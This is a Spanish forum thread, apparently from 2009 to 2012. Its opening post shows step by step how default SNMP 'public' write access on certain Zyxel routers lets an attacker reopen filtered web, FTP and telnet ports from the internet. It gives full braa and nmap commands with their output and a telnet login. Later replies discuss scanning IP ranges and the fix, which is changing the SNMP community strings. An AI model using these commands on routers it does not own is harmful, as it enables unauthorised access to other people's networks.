Autor Tema: ¿ Tienes un Zyxel ? !!! Cuidado !!! (Leído 75777 veces)

5.1 · « **en:** 04-12-2009, 19:24 (Viernes) »

Había oido hablar e incluso puesto en practica alguna vulnerabilidad en routers Zyxel, pero a estas alturas creí que el tema estaba solucionado.
Nada más lejos de la realidad, más bien al contrario, y si no lo crees, sigue leyendo.
Leyendo un paper de d00han.t3am , no he tenido otro remedio que recrear el escenario del ataque.

Que quede bien claro que lo que voy a explicar aquí, ha sido realizado con 2 lineas ADSL de mi propiedad.
RECREAR ESTE DOCUMENTO CON CONEXIONES AJENAS, ES ILEGAL Y NI YO NI ESTA WEB SE HACEN CARGO DE LAS CONSECUENCIAS.

A pesar de que lo advierto, como se que algunos harán mal uso de la información que expongo, por ética, omitiré algunas partes del paper que podrían generar ataques masivos a estos routers.

Empezamos.. lo primero los routers vulnerables a este ataque, P-660HW-D1 , P-660R-D1 , P-660HW-61.

En mi caso, el escenario lo recreé con un P-660HW-D1 con la configuracíon original de telefónica, y su firm por supuesto,
Despues de poner el router a manejar mi conexion, pobre, llevaba mucho en el armario, miro la ip pública que tengo, a partir de ahora 79.75.X.X.

Cito textualmente del paper :

Citar

Por defecto, algunos routers de la serie 600 traen el servicio SNMP activado con su respectivo puerto UDP 161 abierto accesible desde la interface LAN y WAN.
Esto en si no es un problema siempre y cuando se proteja por contraseña y no se pueda modificar nada. Pues normalmente no es asi, es decir, la contraseñaa de lectura o GET es "public" y la de escritura o SET es "public" y no existe ningun tipo de filtrado a este puerto/protocolo.

Normalmente, el protocolo SNMP y los datos a los que se acceden se utilizan para monitorizar el estado del dispositivo. La brecha de seguridad se abre aqui, pero realmente el problema viene cuando podemos MODIFICAR la configuracion del dispositivo a nuestro antojo.

Dicho de manera muy simple, el protocolo SNMP utiliza MIBs para intereaccionar con el dispositivo. Por ejemplo, si hacemos una peticion SNMP a un router usando la OID .1.3.6.1.2.1.1.1.0 nos respondera con un string indicando el Modelo.

Una MIB digamos que es una base de datos de OIDs para interaccionar con un dispositivo via protocolo SNMP. Las MIBs que utilizamos aqui no son las "estandar" . Son especificas de los routers ZyXEL y es mas, muchas de ellas tampoco aparecen en la documentacion oficial, se han obtenido, digamos que, por fuerza bruta. Las OIDs estan estructuradas jerarquicamente y "andando" por ellas y bajando de nivel podemos encontrar sorpresas; sorpresas que nos pueden ayudar a cambiar la configuracion sin permisos de administrador.

ZyXEL por ejemplo, tiene MIBs propias, se encabezan bajo la jeraquia:

:.1.3.6.1.4.1.890.1.x.y.z

Vamos al lio...

El soft que necesitamos (bajo linux)

- nmap
- braa

Encontrar, instalar, o explicar el funcionamiento de este soft, no es parte de este post.

Lanzamos braa para confirmar el modelo del router ...

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.2.1.1.1.0
79.155.X.X:112ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1
1 queries made, 1 queries acknowledged.

Scaneamos con nmap los puertos WEB,FTP y TELNET

Código: [Seleccionar]

# nmap -p 80,21,23 79.155.X.X
tarting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 17:51 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Confirmamos el filtrado de los puertos

El 80

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:80
1 queries made, 1 queries acknowledged.

El 21

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:21
1 queries made, 1 queries acknowledged.

El 23

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:23
1 queries made, 1 queries acknowledged.

Bien, es hora de cambiar los valores

WEB

Código: [Seleccionar]

 #braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81
79.155.X.X:123ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set.
1 queries made, 1 queries acknowledged.

FTP

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

TELNET

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

Volvemos a pasar el nmap

Código: [Seleccionar]

# nmap -p 80,21,23 79.155.X.X
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 17:57 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Y si... estan accesibles ahora .....

Código: [Seleccionar]

r2d2@K-PAX:~/Scripts$ ftp 79.155.X.X
Connected to 79.155.X.X
220  FTP version 1.0 ready at Sun Jan 23 20:43:39 2000
Name (79.155.X.X:r2d2): 1234
331 Enter PASS command
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 



r2d2@K-PAX:~/Scripts$ telnet 79.155.X.X
Trying 79.155.X.X...
Connected to 79.155.X.X
Escape character is '^]'.

Password:****

 Copyright (c) 1994 - 2006 ZyXEL Communications Corp.

                              P-660HW-D1 Main Menu

     Getting Started                      Advanced Management
       1. General Setup                     21. Filter Set Configuration
       2. WAN Backup Setup                  22. SNMP Configuration
       3. LAN Setup                         23. System Security
       4. Internet Access Setup             24. System Maintenance
                                            25. IP Routing Policy Setup
     Advanced Applications                  26. Schedule Setup
       11. Remote Node Setup
       12. Static Routing Setup
       14. Dial-in User Setup               99. Exit
       15. NAT Setup





                          Enter Menu Selection Number:  


Please enter a number

A partir de aquí, vamos, no hace falta explicar las posibilidades que se abren ...

Dejemos las cosas como estaban a nuestro router :

WEB

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
79.155.X.X:123ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set.
1 queries made, 1 queries acknowledged.

FTP

Código: [Seleccionar]

# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

TELNET

Citar

braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

Nos aseguramos ...

Código: [Seleccionar]

 nmap -p 80,21,23 79.155.X.X
tarting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 18:09 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Cabe decir, que a dia de hoy, scanenando un rango de ips de la forma adecuada con braa, es impresionante la cantidad de routers que aparecen.
Así que si tienes uno de estos, ponte las pilas...

Lista de OIDS interesantes :

* Que quereis saber que MAC tiene la IP interna 192.168.1.33 pues nada....

Código: [Seleccionar]

# ./braa -v -x -p 200 public@79.155.X.X:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33
79.155.X.X:107ms:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33:00148525ee19   (ES MI MAC)

* Listar los interfaces de red:

OID: .1.3.6.1.2.1.2.2.1.2.1
Value: enet0

OID: .1.3.6.1.2.1.2.2.1.2.2
Value: enet1

OID: .1.3.6.1.2.1.2.2.1.2.3
Value: pppoe

Para terminar, la forma de corregir esto en nuestro router es cambiar la password GET y SET en el menú SNMP.

Espero que os haya gustado, y dejo bien claro que yo solo explico mi experiencia de realizar lo explicado en el paper, no soy su autor.

PD : Se que no es un tema wireless, pero crei que era conveniente difundir este error de configuracion del Zyxel, si creeis que me he pasado publicando esto aqui, podeis borrarlo...

Saludos

uNbAs · « **Respuesta #1 en:** 04-12-2009, 19:51 (Viernes) »

Aun que no sea un Tema Wireless o algo centrado absolutamente en el mismo este tipo de cosas esta bien saberlas, por lo menos para poder prevenirlas.

Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales.

Gracias por el post

5.1 · « **Respuesta #2 en:** 05-12-2009, 14:58 (Sábado) »

Cita de: uNbAs en 04-12-2009, 19:51 (Viernes)

Aun que no sea un Tema Wireless o algo centrado absolutamente en el mismo este tipo de cosas esta bien saberlas, por lo menos para poder prevenirlas.

Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales.

Gracias por el post

Ok, porque no tenía muy claro si postearlo o no...
En fin, gracias a vosotros...

drvalium · « **Respuesta #3 en:** 05-12-2009, 15:50 (Sábado) »

yo tengo uno de esos, muy bueno el tema

y solo por tocarle un poco los testiculos a uNbAS

¿que mas da si tiene que ver con WIFI o no? en esta sección también se puede hablar de routers no WIFI, o al menos eso da a entender el titulo de la zona.

Equipos y materiales

Puntos de acceso, routers, switchs y bridges
Sección exclusiva de Puntos de acceso, routers, switchs y bridges

un drsaludo

francisco_20 · « **Respuesta #4 en:** 10-12-2009, 21:53 (Jueves) »

Decir que lo he comprobado, y efectivamente, funciona.
Tambien he de decir, que ando esperando la carta de advertencia por parte de telefonica, por el hecho de escanear un rango de ip en busca de "vulnerabilidades".

Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.

He de decir, que la ip que yo escaneé, y por lo tanto, hize pruebas, es de un familiar, por lo que..... ando tranquilo.

Lo dicho, a cambiar la config por defecto de los zyxels!!

Saludos.

drvalium · « **Respuesta #5 en:** 10-12-2009, 22:09 (Jueves) »

Cita de: francisco_20 en 10-12-2009, 21:53 (Jueves)

Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.

me puedes explicar esto mejor

¿una carta por escanear IP's ajenas?

¿escanear IP's es ilegal?

un saludo

5.1 · « **Respuesta #6 en:** 10-12-2009, 22:43 (Jueves) »

Cita de: francisco_20 en 10-12-2009, 21:53 (Jueves)

Decir que lo he comprobado, y efectivamente, funciona.
Tambien he de decir, que ando esperando la carta de advertencia por parte de telefonica, por el hecho de escanear un rango de ip en busca de "vulnerabilidades".

Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.

He de decir, que la ip que yo escaneé, y por lo tanto, hize pruebas, es de un familiar, por lo que..... ando tranquilo.

Lo dicho, a cambiar la config por defecto de los zyxels!!

Saludos.

Si no hay quejas por parte de el dueño de la Ip que scaneas, no hay carta, pero si, hace ya unos años, a mi me mandaron una, pero me decian que revisara mi sistema por si tenia algún virus.

Eso si, ademas de el scaneo, en esa ocasión, entre por recursos compartidos.

Saludos..

francisco_20 · « **Respuesta #7 en:** 15-12-2009, 18:23 (Martes) »

Tal como advierte el documento, es cierto, q es "ilegal" ( no se hasta que punto.... ) escanear los puertos de ips ajenas.

Lo digo, porque, un colega, en efecto, tiene su cartita, diciendo lo mismo, que revise de si el pc tiene algo chungo etc etc.
Y lo unico q hizo, fue, escanear ciertas ips en busca de vulneraribilidades para entrar en un sistema que no es el suyo ( trataba de reventar x web ).

Tambien, cuando un pc está infectao de spam, logicamente, al mandar tu maquina tantisimo spam, tambien avisan, diciendo q.... revises el pc.

En definitiva, todos sabemos que los ISP, en todo momento deben de saber que hacemos, o que dejamos de hacer xD ( ya entra en juego lo que es intimidad o jaleos de esos xD )

Si finalmente llega la carta, la escaneo, y la vemos todos

Saludos.

jorge sca · « **Respuesta #8 en:** 13-07-2010, 15:40 (Martes) »

que tendria yo que modificar en mi router para que no se pudiesen colar como pedro por su casa??

drvalium · « **Respuesta #9 en:** 13-07-2010, 16:05 (Martes) »

¿te has leído el tema o solo el titulo?

Cita de: 5.1 en 04-12-2009, 19:24 (Viernes)

Para terminar, la forma de corregir esto en nuestro router es cambiar la password GET y SET en el menú SNMP.

jorge sca · « **Respuesta #10 en:** 07-09-2010, 11:06 (Martes) »

si lo he leido pero lo lei por encima. muchas gracias

hola-peru · « **Respuesta #11 en:** 17-11-2010, 20:45 (Miércoles) »

hola es la primera vez q entro al foro espero estar en contacto con ustedes bueno veo q hablan de vulneabilidad del rauter zyxel, les cuento q yo trabajo con un rauter zyxel 660 hw31 de franja azul ojo no es inalambrico se puede obtener linea de acceso por este rauter si es asio como evitarlo pq mi red telefonica me dice q ponga un filtro de seguridad como macaffe pq acceden por internet como estar seguro.

Rasca · « **Respuesta #12 en:** 21-01-2011, 12:16 (Viernes) »

Hola a todos!soy un poco novato en esto y tengo un zyxxel,han tardado muy poco en jodermelo,asi q ahi va mi pregunta:por qué tengo una señal perfecta y tengo internet pero no me puedo conectar,he intentado de todo..el filtrado de mac y no se si lo he hecho bien.Mi problema es q mi ordenador envia paquetes pero por ejemplo tengo 5000 enviados y 1 recibido.a que se debe eso??ha sido de la noche a la mañana y me jode pagarles elinternet a mis vecinos.que puedo hacer???gracias

Phyrok · « **Respuesta #13 en:** 21-01-2011, 13:54 (Viernes) »

Muchas gracias por el tutorial, sabía que lo ví en algún lado y ya no recordaba dónde

Cambiado el public que aparece en el menu snmp mediante telnet por otra contraseña (me imagino que serán los tres public que hay, al menos no se ha roto nada

) y capado cualquier acceso remoto a solo web por lan, hale

franalmu · « **Respuesta #14 en:** 25-02-2011, 21:53 (Viernes) »

pues abrá que tener cuidadito

, de todas formas yo ahora estoy con un comtrend CT-535 de los nuevos que dan. Haber si encuentro vulnerabilidades. Un Saludo!

semola · « **Respuesta #15 en:** 25-02-2012, 12:08 (Sábado) »

¿Seria asi para tapar el agujero?, entrar por telnet en menu 22:

Se haría así? como explica esa persona?:

Get community= nombre inventado diferente de public o private
Set community= nombre inventado diferente de public o private
Trusted host= Pon una IP local. Ej.- 192.168.1.2

Trap:
community= nombre inventado diferente de public o private
destination= Pon una IP local. Ej.- 192.168.1.2

lo que sacado de otro foro que no estoy registrado

http://www.adslzone.net/postp892144.html

5.1 · « **Respuesta #16 en:** 25-02-2012, 12:16 (Sábado) »

Exacto, con eso tapas el agujero

d00han.t3am · « **Respuesta #17 en:** 09-08-2012, 10:32 (Jueves) »

Hola soy el autor del "paper" original, y por eso quiero puntualizar un par de cosas:

1º) Estoy convencido de que para que TODOS podamos aprender y para obligar a los fabricantes y distribuidores de IT a mejorar la seguirad hay que publicar las vulnerabilidades y obligarles a reaccionar.

Por eso, aquí teneis el "paper" completo:

http://www.set-ezine.org/autores.php?autor=d00han.t3am

2º) Lo verdaderamente "ético" es avisar a esos fabricantes y distribuidores. Eso hice, por dos veces. Y no obtuve respuesta ni se ha visto modificación de la vulnerabilidad.

Por lo expuesto anteriormente desapruebo la frase:

"Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales."

Al final del artículo se explica como solucionarlo y al no publicarlo completo se omite.

Bueno, a lo mejor a sonado a bronca, pero me gusta que aun esté vivo este asunto.

semola · « **Respuesta #18 en:** 09-08-2012, 17:31 (Jueves) »

Pues sinceramente gracias, sólo comentar para lo inexpertos como yo que más vale un ejemplo que mil palabras escritas de las cuales tantos "0" y "1" no entendemos, aunque investigando nos entrramos de otras cosas.

gr1s0n · « **Respuesta #19 en:** 14-08-2012, 19:05 (Martes) »

no tienen recursos para routers mas seguros los de telefonica, pero les sobra para monitorizar todo el trafico de la red? esto es imposible? q uno haga un sondeo y lo sepan con tantos datos circulando? es q ni filtrando por protocolos XDDDDD

Noticias:

Autor Tema: ¿ Tienes un Zyxel ? !!! Cuidado !!! (Leído 75777 veces)

5.1

uNbAs

5.1

francisco_20

5.1

francisco_20

jorge sca

jorge sca

hola-peru

Rasca

Phyrok

franalmu

semola

5.1

d00han.t3am

semola

gr1s0n